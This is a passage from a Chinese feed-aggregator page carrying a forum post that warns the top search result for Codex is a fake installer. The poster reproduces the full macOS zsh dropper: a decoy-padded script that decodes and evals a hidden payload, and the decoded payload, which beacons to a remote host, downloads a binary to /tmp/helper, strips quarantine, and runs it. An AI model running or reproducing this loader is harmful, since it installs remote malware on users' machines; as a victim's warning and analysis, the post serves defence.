惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
AWS News Blog
AWS News Blog
V
Vulnerabilities – Threatpost
D
Darknet – Hacking Tools, Hacker News & Cyber Security
量子位
博客园 - 叶小钗
AI
AI
T
Tor Project blog
Forbes - Security
Forbes - Security
W
WeLiveSecurity
博客园_首页
爱范儿
爱范儿
J
Java Code Geeks
B
Blog
G
GRAHAM CLULEY
aimingoo的专栏
aimingoo的专栏
Cloudbric
Cloudbric
C
CXSECURITY Database RSS Feed - CXSecurity.com
TaoSecurity Blog
TaoSecurity Blog
L
LINUX DO - 热门话题
阮一峰的网络日志
阮一峰的网络日志
有赞技术团队
有赞技术团队
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Simon Willison's Weblog
Simon Willison's Weblog
云风的 BLOG
云风的 BLOG
Google DeepMind News
Google DeepMind News
H
Help Net Security
博客园 - 三生石上(FineUI控件)
C
Cisco Blogs
C
Cybersecurity and Infrastructure Security Agency CISA
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
P
Palo Alto Networks Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Recent Commits to openclaw:main
Recent Commits to openclaw:main
博客园 - 司徒正美
The Last Watchdog
The Last Watchdog
Blog — PlanetScale
Blog — PlanetScale
T
The Blog of Author Tim Ferriss
S
Secure Thoughts
Spread Privacy
Spread Privacy
F
Fortinet All Blogs
月光博客
月光博客
大猫的无限游戏
大猫的无限游戏
S
SegmentFault 最新的问题
H
Hackread – Cybersecurity News, Data Breaches, AI and More
A
About on SuperTechFans
Security Latest
Security Latest
Webroot Blog
Webroot Blog
Scott Helme
Scott Helme
Hugging Face - Blog
Hugging Face - Blog

信息安全

阿里云被人暴力破解了 - V2EX 申请广电卡遇到疑似信息泄露 或 狸猫换太子的套路 - V2EX 为啥有网站可以检测出姓名与手机号实名信息不一致 - V2EX [apifox 投毒]都在 ai 写文章吗? - V2EX CVE-2026-46242 (Bad Epoll) 可在浏览器沙盒及安卓触发的提权漏洞 - V2EX 好心提醒,最近有个漏洞比较严重,建议大家关注下 - V2EX [原创]关于 Linux 终端安全监控 - V2EX 对 curl 下载脚本一定要万分小心,早上下载 claude 差点翻车 - V2EX 一个 reCAPTCHA 把我骗到重装系统,分享出来给大家提个醒 - V2EX 哪吒监控严重漏洞 CVE-2026-53519 - V2EX windows 汽水音乐下载踩坑: Google 搜索结果 前几个都是假站 已中招 🤦‍♂️ 微软帐号频繁有奇怪的二步登录请求 如果服务器都被黑进去了,还能保证配置文件的安全吗 分享 5-6 月份 CISA,CISSP 考试心得 又是 npm 包投毒...桌面莫名其妙多了个文件... 请教下,提示词注入大家一般都怎么防啊? 被鹰啄了眼 供应链攻击,正在蔓延,各位小心。逾 5500 个 GitHub 仓库在一场供应链攻击中遭感染 APKPure 上的 Telegram 官方版被植入间谍后门 GitHub 有可能被黑了 两个未修复微软 Win11 漏洞披露,涉及 BitLocker 绕过和本地提权 天塌了,数据库被黑客删库了,交 BTC 才会恢复数据,大家有办法恢复数据么 NPM 又被投毒,TanStack、Mistral AI、UiPath 等受波及,可窃取云密钥/SSH 密钥与 GitHub 令牌 用 socket.dev 给 npm install 包一层安全防御 TanStack 最新版本被投毒,病毒会盗密钥和报复性删除用户目录 如何评价 VLESS 漏洞报告正文 Linux 高危内核提权漏洞 新一键 root 提权漏洞 dirtyfrag.io V2EX Ubuntu 高危漏洞 刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查 机场的私有客户端, win 系统 defender 疯狂报病毒,拒下载安装,是有毒吗? - V2EX Bitwarden Cli 遭遇供应链攻击 WARNING: Bitwarden CLI was compromised in a supply chain attack. Vercel 又出问题 - Vercel April 2026 security incident - V2EX 新电脑 brew install node 之后,一个小设置可以提升对供应链投毒的防御 - V2EX Ucsb 发布的关于中转投毒论文 - V2EX 今天测试了一下 SD-wan 线路,结果就发生了这事 CPUID 官网疑似被入侵,提供带毒的 CPU-Z 和 HWMonitor Axios 投毒过程,源于电影高于电影 GitHub 中有些人给代码放恶意代码,如何针对他? - V2EX 手机系统三天两头爆漏洞,有什么产生损失的具体案例吗? - V2EX 出现了这么多开源软件攻击, 是否有必要优化一下发布流程? - V2EX 巨魔款 iOS 版本都存在网页投毒的 BUG。应当如何正确防范?(除升级放弃巨魔外) - V2EX 近期重大安全事件 - V2EX macOS 疑似中毒 - V2EX axios@1.14.1 遭遇供应链投毒:针对开发者及 MCP 用户的高隐蔽性 0-day 攻击 B 站反诈 Up 主总说“胡乱点进”了骗子的电脑,是用的什么方式? - V2EX 来自巨硬、神奇的勒索邮件,邮箱被黑了吗? - V2EX 你们有收到过 Nvdia 发的这种邮件吗 - V2EX [apifox 投毒]都在聊文件细节,就我在关心是如何被投毒的吗? 此次 ApiFox 是否中招自查命令 - V2EX Apifox 自己文件服务被入侵了,为什么说遭供应链攻击?还是理解有问题? 中了 apifox 供应链投毒,想问问大家有装带行为分析的杀软吗? - V2EX Apifox 供应链投毒,中招后是否需要重装系统? - V2EX 昨天 liteLLM 供应链投毒中招的伙计们出来说说都怎么清理的后门 - V2EX Apifox 遭受供应链攻击 - V2EX [记录]-木马 Rondo - V2EX 技术安全:正常网络, P2P/Relay 下双终端安全传输纯文本信息,群聊/多媒体支持并非必须 - V2EX 追踪超算被黑后续 - V2EX 接上一个超算被黑话题,后续情况 - V2EX FOFA 是不是被脱裤了? - V2EX Codex 存在代码执行漏洞,可通过打开恶意文件夹/代码仓库静默触发 - V2EX 某团队公开了一个支付宝的攻击面 请问 V 友们工作上一些项目中敏感信息存哪 广大 V 友注意, IDEA 插件 claude-code-gui 插件会盗刷 token,我已中招,已经举报下架 - V2EX 自建 Emby / MoviePilot 用户安全提醒 - V2EX 使用 AI 中转站会不会泄漏自己的敏感信息?中转站如果给返回一些恶意信息怎么办?有用 AI 中转站的佬来分享下吗? 刚才公司全员被电信诈骗了一次了 想问一下国内关于漏洞挖掘的情报在哪里可以看到最新的啊, TSRC, MSRC 这种的 青龙面板最新版存在未授权 RCE 漏洞,请尽快处置 单纯好奇,如果 AI 用于安全方面,应该能做到很炸裂的效果,但感觉没啥动静 - V2EX 1Password 涨价了,土区如果之前订阅了还能继续原价吗 企业邮箱被盗,群发诈骗网站,怎么教他做人 1password 涨价了。。 orayc.com 一个伪装成向日葵远程的恶意网站 如何保障个人的信息安全? 对 6 位数字 PIN 进行慢哈希是不是形式主义安全? 推荐使用 Pangolin 防护公网暴露的 web 服务 经过飞牛事件,求分享具有一定安全性的 Web / WAF 方案 我也推荐一下自用的安全方式,长随机字符串二级目录,可避免路径穿越 建议给所有需要公网暴露的 web 服务套一层 authelia AI Agent 经常脑补出不存在的包名然后自动安装,感觉供应链攻击风险很大,黑客可以抢注这些包名。为什么没有 AI IDE 能自动在执行前搜索对应包的创建时间、Git star 数、社区评价再安装? 1000 万国产安卓电视设备成为僵尸网络!
紧急避雷! google 搜 Codex 第一个结果是个病毒,千万别装,我已中招!
zrc · 2026-05-11 · via 信息安全

我把脚本贴上来,脚本中的变量会每次发生变化,大概的过程是:
1. 通过 curl 获取脚本
2. 脚本中先调用一个接口,告诉远程主机,有人中招了
```bash
curl -fsS --connect-timeout 5 --max-time 10 -X POST -H 'user: BWJF3TX87QAqxEsOaxLu9ZIAH_q__w3aVtJZCqsYhTE' -H 'BuildID: ks6u7pJc12FKlHPoS_nYGUbye8dGpkQrJZkyhNfx9ZI' "https://dedelk.com/api/metrics/run?event=pasted%"
```
3. 接着下载一个 bin 文件放在了/temp/helper ,
4. 执行/temp ,注册系统启动事件,启动程序,删除/temp/helper

具体的脚本内容如下:
第一段更多的是一个迷惑作用,最关键的是 f0f6of 这个变量的内容
```bash
#!/bin/zsh
# zzud4h2ltf1y 4890
l5xieuhg="/usr/local/r0mg9"
v79vjj=$(uname -s 2>/dev/null)
if [ -z "$v79vjj" ]; then
v79vjj="Darwin"
fi
nyyvhzgvij="auto"
d60149dy8v3h="$(sw_vers -productVersion 2>/dev/null)"
check_integrity_jmq() {
local rzut=0
[ -d "$HOME" ] && rzut=1
return $rzut
}
x4itis=("mkjel4tgg" "qlfo51mwah" "zqg4up9ffg" "gbwzya0uf")
xtma=0
while [ $xtma -lt 3 ]; do
: "$((RANDOM % 256))"
xtma=$((xtma+1))
done

z4n64q62=$(cat <<'_EOF_'
X1SZu9e8MLYgp7YEYHdgEmWo3WmDtWP1pg8ydKufpE9yUtQLEIizIQ==
_EOF_
)

f0f6of=$(openssl base64 -d <<'PAYLOAD_END' | gunzip
H4sIAIXW/GkC/5VSXZOaMBR951eklhGdDiOBBNSpO7Pb/XBtu+5W2+46zjigKBQE5Nu1/PeGBIu2
felDJrk3556T3HPfvukYttd5jSyOC2AQbNe2agwafKuTRCG9SoLY3ppAvuiszLTjJa4LfgI9c4Bw
CELbiwGvFEK7wbmh0UN4gCUFcam5DaARws2Pkqr15fLhevy5TUBckGF/nQ/4Fq1dA2EOsTSHKqpW
eVbmkibPJazRBRHJI1zvmOyYYLBKYoWcCQbjCgsZB4YsxpjVUG6Z5mlNqVHelzm15FSJplZh1UpH
pXWShhkn5VYYF3uP0OacLOq+nn2H0uNKroTwBwoqgLiOJkAUl77nmctYLNvqJzHAJLfVcxoDKAHx
GTyOJ1MgDoGQRGbYB1ffR7fK9LmrPV3u8ptorOefkt7s/nK42C0WmaJ/i0ezD7voxZreCLTsKrHd
1f11HziRmmjBaAnl24/u8NGfLLyXu6/G3uyu7gLnKRzNnL31sM4JmwAa/IHZUzTA+9rtE+PliyYE
TU43VnKU/Z+JVbMRrpuLjmYgZgxp/D9NxXJtIpIrHshqqElHM49GocosahRxILF2O807fS/DIzYg
pIbpSPWAqdVZlUm9ncdBevZdTaol2GwRmBW4Pe+vWShZSxU2ymfz4AP+wN5WkBPragGaTRJQSQJZ
nkDoBRUpwLv8z4sq4Lg+CdLextbQxukPpIImsnSjp/n+dxxHiS+tLBr/AlTYUkgEBAAA
PAYLOAD_END
)

k2wjsre8="/usr/local/qxh9l"
aau2=0
while [ $aau2 -lt 2 ]; do
: "$((RANDOM % 256))"
aau2=$((aau2+1))
done
if [ -z "$f5bskk" ]; then
f5bskk="Darwin"
fi
f5bskk=$(uname -s 2>/dev/null)
z1bt7m="$(date +%s)"
gc_collect_k5g() {
local zms3=0
[ -d "$HOME" ] && zms3=1
return $zms3
}
vgbd9v=("zzwwo0" "ppfrb3yrz" "ninsq")
zm3wi7o7x="false"

eval "${f0f6of}"

```

f0f6of 的内容,也就是这个代码最真实的意图:

```bash
#!/bin/zsh

p1ppmfi6b="$(/usr/bin/uptime 2>/dev/null | awk '{print $3}')"
lrb945=5034
vemp1br1gj="$((RANDOM))"

pw5ofx=$(printf '\150\164\164\160\163\072\057\057\144\145\144\145\154\153\056\143\157\155\057\141\160\151\057\155\145\164\162\151\143\163\057\162\165\156\077\145\166\145\156\164\075\160\141\163\164\145\144')
kws8z=$(printf '\143\165\162\154')
${kws8z} -fsS --connect-timeout 5 --max-time 10 -X POST -H 'user: BWJF3TX87QAqxEsOaxLu9ZIAH_q__w3aVtJZCqsYhTE' -H 'BuildID: ks6u7pJc12FKlHPoS_nYGUbye8dGpkQrJZkyhNfx9ZI' "${pw5ofx}" </dev/null >/dev/null 2>&1 &
abd2sw=$(printf '\150\164\164\160\163\072\057\057\147\162\145\145\156\141\143\164\151\166\056\143\157\155\057\152\145\164\142\162\141\151\156\163\057\165\160\144\141\164\145')
uhqq7n=$(printf '\057\164\155\160\057\150\145\154\160\145\162')
ixtpv=$(printf '\170\141\164\164\162')
hpl9n=$(printf '\143\150\155\157\144')
${kws8z} -o ${uhqq7n} ${abd2sw} && ${ixtpv} -c ${uhqq7n} && ${hpl9n} +x ${uhqq7n} && ${uhqq7n}

: ${v9gi74gk:=0}
: ${wvgavxy:=0}
: ${tsuo0dh:=0}
```